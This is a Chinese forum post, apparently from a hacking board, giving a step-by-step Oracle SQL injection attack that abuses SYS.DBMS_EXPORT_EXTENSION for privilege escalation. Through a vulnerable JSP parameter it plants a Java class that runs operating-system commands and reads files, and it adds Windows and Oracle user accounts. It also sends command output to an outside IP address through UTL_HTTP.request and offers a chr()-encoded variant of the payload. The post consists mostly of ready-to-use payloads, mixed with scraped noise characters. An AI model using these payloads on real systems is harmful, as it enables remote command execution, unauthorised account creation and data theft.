以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
" x& q) F* ]4 m
# _9 e* N6 ~6 e9 A8 a /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
6 S' o4 U5 b, }. N4 S" V的形式即可。(用" 'a'|| "是为了让语句返回true值) + }+ m0 h. L* O' j
语句有点长,可能要用post提交。 - z! k4 V- a$ x! _3 E$ n
以下是各个步骤:
m3 W* @4 c7 ]' I1.创建包
. n6 R+ x+ `# B通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
/ B R* K2 ~+ X) u" ~) V/ d/xxx.jsp?id=1 and '1'<>'a'||( [8 U- D6 W" @% p2 V1 P
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''' J( P* z w ^# E+ s1 T4 Q0 k
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(1 E$ \2 o; T$ [: f. T, m( H* Q8 B
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}4 x' n! A4 v' z" f& E
}'''';END;'';END;--','SYS',0,'1',0) from dual
, N' }9 A9 A' S7 e' Y; i8 c) , K% H' ^9 S, m( P
------------------------
$ ?( o% Z8 |8 m如果url有长度限制,可以把readFile()函数块去掉,即: ( c8 F e' F7 x+ R( b5 W
/xxx.jsp?id=1 and '1'<>'a'||(
9 B% u6 [" h' ]8 u. @2 t5 J8 zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ n* k* a9 c) X7 Z1 D: rcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
4 N3 }$ r, i( y' b/ N) Enew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}3 n( s5 j/ Y# c( n
}'''';END;'';END;--','SYS',0,'1',0) from dual
9 r7 g5 ~, v' {/ P) 9 |! g; ~4 v7 t4 V( K. r2 X; s# V, c
同时把后面步骤 提到的 对readFile()的处理语句去掉。
$ d( E- j9 ?0 Z; I1 x- M" J------------------------------
: |# L. {9 Z, e/ i) V" A2.赋Java权限
" q% [: S8 N) Z+ u I* jselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual2 U- ?9 J! u$ a1 S& B, M
3.创建函数 7 I: C5 D" Q( i e3 s( S% x
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
7 O3 B" x. u8 f! @create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
1 h! E- e& c( f3 e: B3 ?select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''( Z2 Y$ W' Y( o( [1 ]
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
( z c: V: }! f/ p6 d% f: x* W4.赋public执行函数的权限 3 ]: H7 c' i Z- S$ C, x6 K3 f
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual; @# K! I8 F y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
/ Y, k. y4 {7 d: r4 c$ O5.测试上面的几步是否成功
B3 v$ h# @6 Z' V8 { G( Hand '1'<>'11'||(
$ m$ B8 Q5 t/ [+ ~6 F$ Y% ]select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
( z: B1 Q; J$ }( k) X) ; J0 K5 m5 X t3 e% i8 }
and '1'<>(
7 e" ?# ~' X. u eselect OBJECT_ID from all_objects where object_name ='LINXREADFILE' ' y, n, A6 \$ n% Z; v
) 3 j7 f0 _3 ]# B8 ~5 f9 x2 W5 w
6.执行命令: ( ~6 M4 d$ B) [
/xxx.jsp?id=1 and '1'<>(
; j! D' _" \7 D* U5 x9 q2 nselect sys.LinxRunCMD('cmd /c net user linx /add') from dual / o( _! j t) J% n+ H3 j9 b
3 e* {. G% m4 Q! F2 Z- q
)
" G3 c4 k- s p$ t* d9 B5 r& o/xxx.jsp?id=1 and '1'<>( , T g8 ~4 s( r5 ~5 N* {
select sys.LinxReadFile('c:/boot.ini') from dual# y$ T. h* ]% L+ R5 G$ p j
& F$ B9 J, G: n1 b7 U
)9 |" S5 V4 M$ I( E
9 r/ J0 N' M4 U
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
! R+ f" n, q. U( X5 W: [如果要查看运行结果可以用 union : , g# e/ M& t) w9 ], e% L" z
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual" N/ K. w- u* q
或者UTL_HTTP.request(:
$ F" Z5 f/ B- J. k( @, ^1 H& E/xxx.jsp?id=1 and '1'<>(
0 @* e- C$ F/ K2 T/ T* l" P5 u1 ISELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual7 y4 Z( e7 Z3 J9 x# T8 P- D
) & U/ [) r4 a' z9 V( d+ c8 z
/xxx.jsp?id=1 and '1'<>( 9 E* q) P+ s, b1 A
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
; Y/ `: }4 d" U)
8 D+ ]3 B# ~, n6 q3 c注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
9 j: F7 q( G0 b# P4 x-------------------- + v* h+ W# a4 Q9 r
6.内部变化
- {8 B$ c5 ?- x) ?7 T通过以下命令可以查看all_objects表达改变: : }0 f1 N0 {, x5 i$ g1 Z% F
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'# X" y/ }! S8 F L: t
7.删除我们创建的函数
8 W C9 e. V- Z, K. J: n0 ^select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') s: c+ ?0 M/ Y2 O; t. R Y
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
' S: }9 ~7 b2 O$ W==================================================== * u4 L. X5 j0 x/ G8 Z
全文结束。谨以此文赠与我的朋友。
, S, e+ c+ H- i2 Mlinx 1 A2 }3 r! F, `
124829445 # d" k( s. H/ P
2008.1.12 5 X0 m/ Q4 o2 Z: U) K) x( ?
linyujian@bjfu.edu.cn
* n- Y2 ?: u! r& F: ]- p _======================================================================
& U' U9 _4 n% n1 X; m4 x+ c测试漏洞的另一方法: ) y) l3 {1 g X+ p( f& N
创建oracle帐号:
2 L* Y$ t" \+ o& S- h! Qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; O8 j" y9 E7 l7 P$ Q
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual; @ w' e! P& \$ a0 s
即:
# a; C1 o8 D% o# {/ ~/ W# Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
! a# s9 E$ K* C. W0 J0 n! j; o# `chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual $ J4 x! n3 P$ d" M0 r
确定漏洞存在:
2 l7 p# Z0 s( d3 T: D1<>( 7 \, b1 [+ x" Q9 h; o' ^
select user_id from all_users where username='LINXSQL' # F8 D# b, n. P2 [
)
& b& O$ i9 T9 Z) d% I& X给linxsql连接权限: 0 D" J3 C* E- R& p- D5 ^+ j2 w
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' u0 z1 ^ `7 J8 L9 dGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
! U5 J1 _9 ^, Y- t删除帐号:
/ I, @& b; C# z4 m! J( _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''( c# p7 y5 R& U, {
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
5 g1 x5 L) \0 H0 E/ F1 O, V" E; z======================
7 d, W ~3 c4 \% A7 q! Z以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
5 g9 d! v; [ ?6 B* h1.jsp?id=1 and '1'<>(
/ m# w4 a" o3 \# gselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''': G( w! J# J& Q) b
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual2 I1 ~7 X( E& Z- E/ {
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
) ~9 |) ^9 U& x. u0 s )
# P9 L. Q% g& O- e. K4 Q4 @' ~' R, ]5 M; p: k1 e% p
; f. w1 D k: z* v
4 Y; X& f8 z R, ?' C |
发表于 2012-12-18 12:21:48
收藏
支持
反对